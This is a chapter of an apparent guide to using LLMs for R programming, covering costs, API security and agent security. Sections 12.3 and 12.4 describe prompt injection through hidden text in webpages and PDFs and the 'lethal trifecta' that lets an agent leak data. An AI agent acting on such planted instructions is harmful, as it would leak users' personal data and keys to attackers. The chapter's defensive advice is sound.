12 Cost and security

This chapter addresses important practical considerations when using LLMs for R programming:

12.1 Cost considerations

Managers and lab heads need to consider cost and impact on research budget
e.g. Copilot subscription free for students
Tools like Roo Code can be more expensive (pay per use as using API).
Still, many of the tasks they can do are less than a hiring a person to do that (though they definitely need expert human oversight)
e.g. I estimated that processing 6000 abstracts to extract data for a lit review might cost about USD300 (including cost of developing prompts)
There are strategies you can use for optimizing token usage if you really want to optimize costs
You will need to balance cost with capabilities. Cheaper models are often less proficent.

AI companies are running at a loss and its quite likely that costs will go up in future. The aim right now is to get us all dependent on the technology, so that we have to keep paying in future (another reason I think its improtant our own countries develop these capaibilites, and that we also need to strive to be capable to work in AI free ways as well. )

12.2 API security

Managing API keys and credentials
Sanitizing inputs to remove sensitive information
Local vs. cloud-based LLM solutions
Auditing and monitoring LLM interactions

12.3 Agent security

Can run code on your computer
Be careful what it is doing
Read prompts before running them

Note that malicious people can hide text in webpages and pdfs and other content you might be uploading as context, e.g. using white font or tiny font. The LLM will still see this text and may act on it.

12.4 Lethal trifecta for prompt injection attacks

Never allow the agent to do all these three things at the same time:

Read unverified material from the web (even if its material you downloaded earlier)
Have access to sensitive data (which includes your personal data, API keys and your research data)
Upload information to the web (which includes creating webpages or pushing commits to github)

The Lethal Trifecta for prompt injection attacks (coined by Simon Williamson) is access to private data, ability to communicate externally and exposure to untrusted content.

What can happen is that if your agent can read untrusted sources, those sources may contain malicious prompts. These prompts could convince the agent to do things like send or post your personal data to the hacker or create malicious code that runs on your computer.

You want to be sure your agents can’t do these three things at once. Remember sensitive data includes your name, username, phone number, email, API keys as well as sensitive research data.